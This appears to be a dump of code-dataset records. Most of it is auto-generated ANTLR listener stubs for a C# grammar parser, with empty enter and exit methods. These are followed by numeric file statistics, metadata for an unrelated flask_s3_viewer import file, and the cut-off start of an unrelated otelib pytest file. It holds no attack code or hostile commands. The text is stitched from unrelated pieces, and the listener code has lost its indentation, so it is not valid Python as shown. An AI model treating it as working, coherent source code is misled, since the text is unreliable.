# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def exitInterface_indexer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_declaration.
def enterEnum_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_declaration.
def exitEnum_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_base.
def enterEnum_base(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_base.
def exitEnum_base(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_body.
def enterEnum_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_body.
def exitEnum_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifiers.
def enterEnum_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifiers.
def exitEnum_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifier.
def enterEnum_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifier.
def exitEnum_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declarations.
def enterEnum_member_declarations(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declarations.
def exitEnum_member_declarations(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declaration.
def enterEnum_member_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declaration.
def exitEnum_member_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_declaration.
def enterDelegate_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_declaration.
def exitDelegate_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifiers.
def enterDelegate_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifiers.
def exitDelegate_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier.
def enterDelegate_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier.
def exitDelegate_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attributes.
def enterGlobal_attributes(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attributes.
def exitGlobal_attributes(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_sections.
def enterGlobal_attribute_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_sections.
def exitGlobal_attribute_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_section.
def enterGlobal_attribute_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_section.
def exitGlobal_attribute_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def enterGlobal_attribute_target_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def exitGlobal_attribute_target_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target.
def enterGlobal_attribute_target(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target.
def exitGlobal_attribute_target(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attributes.
def enterAttributes(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attributes.
def exitAttributes(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_sections.
def enterAttribute_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_sections.
def exitAttribute_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_section.
def enterAttribute_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_section.
def exitAttribute_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target_specifier.
def enterAttribute_target_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target_specifier.
def exitAttribute_target_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target.
def enterAttribute_target(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target.
def exitAttribute_target(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_list.
def enterAttribute_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_list.
def exitAttribute_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute.
def enterAttribute(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute.
def exitAttribute(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_name.
def enterAttribute_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_name.
def exitAttribute_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_arguments.
def enterAttribute_arguments(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_arguments.
def exitAttribute_arguments(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument_list.
def enterPositional_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument_list.
def exitPositional_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument.
def enterPositional_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument.
def exitPositional_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument_list.
def enterNamed_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument_list.
def exitNamed_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument.
def enterNamed_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument.
def exitNamed_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_argument_expression.
def enterAttribute_argument_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_argument_expression.
def exitAttribute_argument_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def enterClass_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def exitClass_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def enterStruct_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def exitStruct_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def enterInterface_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def exitInterface_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def enterDelegate_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def exitDelegate_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def enterField_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def exitField_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def enterMethod_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def exitMethod_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def enterProperty_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def exitProperty_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def enterEvent_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def exitEvent_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def enterIndexer_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def exitIndexer_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def enterOperator_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def exitOperator_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def enterConstructor_modifier_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def exitConstructor_modifier_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def enterDestructor_declaration_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def exitDestructor_declaration_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def enterStatic_constructor_modifiers_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def exitStatic_constructor_modifiers_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def enterEmbedded_statement_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def exitEmbedded_statement_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unsafe_statement.
def enterUnsafe_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unsafe_statement.
def exitUnsafe_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_unsafe.
def enterType121_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_unsafe.
def exitType121_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_type121.
def enterPointer_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_type121.
def exitPointer_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unmanaged_type121.
def enterUnmanaged_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unmanaged_type121.
def exitUnmanaged_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def enterPrimary_no_array_creation_expression_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def exitPrimary_no_array_creation_expression_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def enterUnary_expression_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def exitUnary_expression_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def enterPointer_indirection_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def exitPointer_indirection_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#addressof_expression.
def enterAddressof_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#addressof_expression.
def exitAddressof_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#sizeof_expression.
def enterSizeof_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#sizeof_expression.
def exitSizeof_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_statement.
def enterFixed_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_statement.
def exitFixed_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def enterFixed_pointer_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def exitFixed_pointer_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def enterFixed_pointer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def exitFixed_pointer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def enterFixed_pointer_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def exitFixed_pointer_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def enterStruct_member_declaration_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def exitStruct_member_declaration_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def enterFixed_size_buffer_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def exitFixed_size_buffer_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def enterFixed_size_buffer_modifiers(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def exitFixed_size_buffer_modifiers(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def enterFixed_size_buffer_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def exitFixed_size_buffer_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#buffer_element_type121.
def enterBuffer_element_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#buffer_element_type121.
def exitBuffer_element_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def enterFixed_size_buffer_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def exitFixed_size_buffer_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def enterFixed_size_buffer_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def exitFixed_size_buffer_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def enterLocal_variable_initializer_unsafe(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def exitLocal_variable_initializer_unsafe(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#stackalloc_initializer.
def enterStackalloc_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#stackalloc_initializer.
def exitStackalloc_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#from_contextual_keyword.
def enterFrom_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#from_contextual_keyword.
def exitFrom_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#let_contextual_keyword.
def enterLet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#let_contextual_keyword.
def exitLet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#where_contextual_keyword.
def enterWhere_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#where_contextual_keyword.
def exitWhere_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_contextual_keyword.
def enterJoin_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_contextual_keyword.
def exitJoin_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#on_contextual_keyword.
def enterOn_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#on_contextual_keyword.
def exitOn_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def enterEquals_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def exitEquals_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#into_contextual_keyword.
def enterInto_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#into_contextual_keyword.
def exitInto_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def enterOrderby_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def exitOrderby_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def enterAscending_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def exitAscending_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def enterDescending_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def exitDescending_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_contextual_keyword.
def enterSelect_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_contextual_keyword.
def exitSelect_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#group_contextual_keyword.
def enterGroup_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#group_contextual_keyword.
def exitGroup_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#by_contextual_keyword.
def enterBy_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#by_contextual_keyword.
def exitBy_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def enterPartial_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def exitPartial_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def enterAlias_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def exitAlias_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def enterYield_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def exitYield_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#get_contextual_keyword.
def enterGet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#get_contextual_keyword.
def exitGet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#set_contextual_keyword.
def enterSet_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#set_contextual_keyword.
def exitSet_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#add_contextual_keyword.
def enterAdd_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#add_contextual_keyword.
def exitAdd_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def enterRemove_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def exitRemove_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def enterDynamic_contextual_keyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def exitDynamic_contextual_keyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#arglist.
def enterArglist(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#arglist.
def exitArglist(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_arrow.
def enterRight_arrow(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_arrow.
def exitRight_arrow(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift.
def enterRight_shift(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift.
def exitRight_shift(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift_assignment.
def enterRight_shift_assignment(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift_assignment.
def exitRight_shift_assignment(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#literal.
def enterLiteral(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#literal.
def exitLiteral(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_literal.
def enterBoolean_literal(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_literal.
def exitBoolean_literal(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#keyword.
def enterKeyword(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#keyword.
def exitKeyword(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_definition.
def enterClass_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_definition.
def exitClass_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#struct_definition.
def enterStruct_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#struct_definition.
def exitStruct_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_definition.
def enterInterface_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_definition.
def exitInterface_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#enum_definition.
def enterEnum_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#enum_definition.
def exitEnum_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_definition.
def enterDelegate_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_definition.
def exitDelegate_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration2.
def enterEvent_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration2.
def exitEvent_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#field_declaration2.
def enterField_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#field_declaration2.
def exitField_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration2.
def enterProperty_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration2.
def exitProperty_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declaration2.
def enterConstant_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declaration2.
def exitConstant_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration2.
def enterIndexer_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration2.
def exitIndexer_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_definition.
def enterDestructor_definition(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_definition.
def exitDestructor_definition(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration2.
def enterConstructor_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration2.
def exitConstructor_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration2.
def enterMethod_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration2.
def exitMethod_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name.
def enterMethod_member_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name.
def exitMethod_member_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name2.
def enterMethod_member_name2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name2.
def exitMethod_member_name2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration2.
def enterOperator_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration2.
def exitOperator_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration2.
def enterInterface_method_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration2.
def exitInterface_method_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration2.
def enterInterface_property_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration2.
def exitInterface_property_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration2.
def enterInterface_event_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration2.
def exitInterface_event_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def enterInterface_indexer_declaration2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def exitInterface_indexer_declaration2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_access2.
def enterMember_access2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_access2.
def exitMember_access2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#method_invocation2.
def enterMethod_invocation2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#method_invocation2.
def exitMethod_invocation2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression2.
def enterObject_creation_expression2(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression2.
def exitObject_creation_expression2(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121OF.
def enterType121OF(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121OF.
def exitType121OF(self, ctx):
pass
| 29.387062 | 95 | 0.724136 | 12,996 | 108,115 | 5.842567 | 0.043552 | 0.064559 | 0.107599 | 0.193678 | 0.873133 | 0.85833 | 0.852456 | 0.851561 | 0.846964 | 0.778006 | 0 | 0.016712 | 0.22292 | 108,115 | 3,678 | 96 | 29.395052 | 0.887066 | 0.494594 | 0 | 0.499388 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.499388 | false | 0.499388 | 0.000612 | 0 | 0.500612 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
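The generated listener above is a base class of no-op hooks; an ANTLR tree walker calls each `enter*`/`exit*` method as it visits parse-tree nodes, and users subclass it to override only the hooks they need. A dependency-free sketch of that pattern (the base class here is a stand-in for the generated one, and `ctx` is left untyped):

```python
class CSharp4ParserListenerBase:
    """Stand-in for the generated listener: every hook is a no-op."""
    def enterClass_definition(self, ctx):
        pass
    def exitClass_definition(self, ctx):
        pass

class ClassDefinitionCounter(CSharp4ParserListenerBase):
    """Override only the hooks you care about; the rest stay no-ops."""
    def __init__(self):
        self.class_count = 0

    def enterClass_definition(self, ctx):
        self.class_count += 1

listener = ClassDefinitionCounter()
for _ in range(3):  # simulate the walker visiting three class_definition nodes
    listener.enterClass_definition(None)
    listener.exitClass_definition(None)
print(listener.class_count)  # → 3
```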
6b74b96071aef9bc9bd7d227abd26a8fb02521b8 | 44 | py | Python | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 7 | 2020-08-07T05:56:12.000Z | 2021-08-23T22:12:20.000Z | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 1 | 2021-09-07T03:41:44.000Z | 2021-09-07T03:41:44.000Z | flask_s3_viewer/aws/__init__.py | blairdrummond/flask-s3-viewer | e8ce36d4456da49c0b5642da3088d016e780ef83 | [
"MIT"
] | 2 | 2020-06-11T11:17:37.000Z | 2020-08-08T00:32:42.000Z | from . import ref, session
from . import s3
| 14.666667 | 26 | 0.727273 | 7 | 44 | 4.571429 | 0.714286 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028571 | 0.204545 | 44 | 2 | 27 | 22 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6baa6f6861e296ce39de7672e714f7beefb7b2d4 | 5,432 | py | Python | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | 1 | 2022-01-24T15:18:14.000Z | 2022-01-24T15:18:14.000Z | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | 34 | 2022-01-28T16:22:46.000Z | 2022-03-30T17:07:36.000Z | tests/strategies/test_mapping.py | EMMC-ASBL/otelib | a66001f3a8b94fc7a113d25f03ff04ba1e2fbf51 | [
"MIT"
] | null | null | null | """Tests for `otelib.strategies.mapping`."""
from typing import TYPE_CHECKING
import pytest
if TYPE_CHECKING:
from typing import Callable, Union
from tests.conftest import OTEResponse, ResourceType
def test_create(
mock_ote_response: "OTEResponse",
ids: "Callable[[Union[ResourceType, str]], str]",
server_url: str,
testdata: "Callable[[Union[ResourceType, str]], dict]",
) -> None:
"""Test `Mapping.create()`."""
from otelib.strategies.mapping import Mapping
mock_ote_response(
method="post",
endpoint="/mapping",
return_json={"mapping_id": ids("mapping")},
)
mapping = Mapping(server_url)
assert mapping.id is None
mapping.create(
mappingType="triples",
